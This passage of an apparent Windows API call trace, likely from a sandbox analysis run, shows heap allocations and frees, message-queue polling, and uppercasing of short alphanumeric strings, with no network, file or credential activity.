wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.606] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.607] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0200.608] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0200.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0200.609] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.609] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0200.611] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0200.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.612] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0200.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0200.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0200.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.614] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.615] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0200.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0200.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0200.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.616] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0200.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.617] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0200.617] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0200.617] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0200.618] HeapFree (in: 